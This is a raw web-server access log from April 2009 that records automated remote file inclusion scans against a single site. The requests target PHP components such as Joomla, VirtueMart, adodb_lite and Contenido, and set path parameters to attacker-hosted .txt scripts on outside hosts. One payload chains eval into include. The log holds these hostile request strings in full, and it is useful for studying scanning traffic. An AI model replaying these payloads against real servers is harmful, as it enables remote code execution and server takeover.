62.58.32.74 - - [02/Apr/2009:09:00:01 -0700] "GET /logs/access_081106.log//include/write.php?dir=http://www.sanctamaria-aarschot.be/smarts/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.12.185.19 - - [02/Apr/2009:09:00:02 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
90.212.91.87 - - [02/Apr/2009:09:00:03 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:00:05 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:00:06 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:00:06 -0700] "GET /logs/access_080519.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:00:33 -0700] "GET /logs/access_090107.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:00:33 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:00:33 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.17 - - [02/Apr/2009:09:00:33 -0700] "GET /logs/access_081103.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bernardyni.ofm.pl/organy1/tmp/zero/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:00:45 -0700] "GET /logs/access_080519.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:00:51 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:00:51 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:00:52 -0700] "GET /logs/access_090122.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:00:52 -0700] "GET /logs/access_080130.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:29 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:29 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:29 -0700] "GET /logs/access_080212.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:29 -0700] "GET /logs/access_080402.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:32 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
71.0.121.105 - - [02/Apr/2009:09:01:33 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
71.0.121.105 - - [02/Apr/2009:09:01:33 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.dmulk.com"
124.0.73.2 - - [02/Apr/2009:09:01:35 -0700] "GET /logs/access_080708.log%20//index1.php?page=http://www.bsdhz.ch//assets/media/Roseid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.242.224.62 - - [02/Apr/2009:09:01:45 -0700] "GET /logs/access_080811.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wwwam.org//langs/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.dmulk.com"
201.134.110.45 - - [02/Apr/2009:09:01:47 -0700] "GET /logs/access_080811.log/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wwwam.org//langs/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.134.110.45 - - [02/Apr/2009:09:01:47 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wwwam.org//langs/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.134.110.45 - - [02/Apr/2009:09:01:47 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://wwwam.org//langs/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:01:56 -0700] "GET /logs//components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:01:57 -0700] "GET /logs/access_080209.log//components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:01:58 -0700] "GET /logs/access_080304.log//components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:02:00 -0700] "GET /components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.204.8.85 - - [02/Apr/2009:09:02:01 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
194.204.8.85 - - [02/Apr/2009:09:02:01 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
193.6.189.162 - - [02/Apr/2009:09:02:14 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
193.6.189.162 - - [02/Apr/2009:09:02:14 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
95.215.48.14 - - [02/Apr/2009:09:02:53 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
95.215.48.14 - - [02/Apr/2009:09:02:53 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://66.7.56.125/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:21 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:22 -0700] "GET /skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:27 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:28 -0700] "GET /skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:28 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:28 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:38 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:03:59 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:05:01 -0700] "GET /logs/access_080519.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:05:15 -0700] "GET /logs/access_080524.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:05:51 -0700] "GET /logs/access_080810.log//contenido/includes/include.php?cfg[path][contenido]=http://metalblack.altervista.org/idalb.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:05:51 -0700] "GET /contenido/includes/include.php?cfg[path][contenido]=http://metalblack.altervista.org/idalb.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:05:52 -0700] "GET /logs//contenido/includes/include.php?cfg[path][contenido]=http://metalblack.altervista.org/idalb.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
59.16.91.22 - - [02/Apr/2009:09:06:44 -0700] "GET /logs/access_090128.log//contenido/includes/include.php?cfg[path][contenido]=http://metalblack.altervista.org/idalb.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.23.230.64 - - [02/Apr/2009:09:06:50 -0700] "GET / HTTP/1.1" 200 105655 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:06:51 -0700] "GET /logs/access_080129.log/?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:06:52 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:06:55 -0700] "GET /logs/access_071228.log/?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:07:02 -0700] "GET /home.php?pagina=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:07:07 -0700] "GET /skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:07:08 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:07:08 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.224.189.2 - - [02/Apr/2009:09:07:16 -0700] "GET /home.php?pagina=http://www.buenosairesidiomas.com/centro/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:07:26 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:07:33 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:07:35 -0700] "GET /logs/access_080129.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:07:35 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 93470 "-" "Mozilla/5.0" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:07:39 -0700] "GET /logs/access_071228.log/?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.70.207 - - [02/Apr/2009:09:07:52 -0700] "GET /atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.70.207 - - [02/Apr/2009:09:07:52 -0700] "GET /logs//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.70.207 - - [02/Apr/2009:09:07:52 -0700] "GET /logs/access_080713.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.48.70.207 - - [02/Apr/2009:09:07:52 -0700] "GET /logs/access_080903.log//atom.php5?page=http://wwwam.org//langs/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:07:59 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:07:59 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:00 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:00 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:01 -0700] "GET /logs/access_080611.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:02 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:02 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:03 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:03 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:06 -0700] "GET /components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:06 -0700] "GET /logs/access_081107.log/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:08:06 -0700] "GET /logs/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.242.99.101 - - [02/Apr/2009:09:08:07 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 200 65555 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:08:15 -0700] "GET /logs/access_080606.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:08:16 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:08:16 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:08:23 -0700] "GET /logs/access_080524.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:08:32 -0700] "GET /logs/access_080613.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:38 -0700] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:38 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:38 -0700] "GET /logs/access_080624.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:38 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:42 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:42 -0700] "GET /logs/access_080624.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:42 -0700] "GET /logs/access_080425.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [02/Apr/2009:09:08:42 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:08:43 -0700] "GET /logs/access_080304.log%20/administrator/components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:08:43 -0700] "GET /logs/administrator/components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:08:44 -0700] "GET /administrator/components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.91.246.64 - - [02/Apr/2009:09:08:53 -0700] "GET /logs/access_080304.log%20//components/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.sangabuay.com/p/info.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:09:20 -0700] "GET /logs/access_081107.log%20/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.138.168.158 - - [02/Apr/2009:09:09:34 -0700] "GET /logs/access_080519.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:09:36 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:09:37 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:09:37 -0700] "GET /skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:09:46 -0700] "GET /logs/access_080905.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:09:46 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:09:46 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.15.206.26 - - [02/Apr/2009:09:09:59 -0700] "GET /logs/access_081107.log%20/components/com_joomlaboard/file_upload.php?sbp=http://www.geocities.com/sgt_bgtlo/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.79.47.122 - - [02/Apr/2009:09:10:08 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.candidography.com/zero/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:10:13 -0700] "GET /logs/access_080107.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
81.175.71.121 - - [02/Apr/2009:09:10:13 -0700] "GET /logs/access_080102.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.henorita.com/sol-contents/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.40.97.120 - - [02/Apr/2009:09:10:16 -0700] "GET /logs/access_081113.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.racers.co.kr/cc/Debug/fatal1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
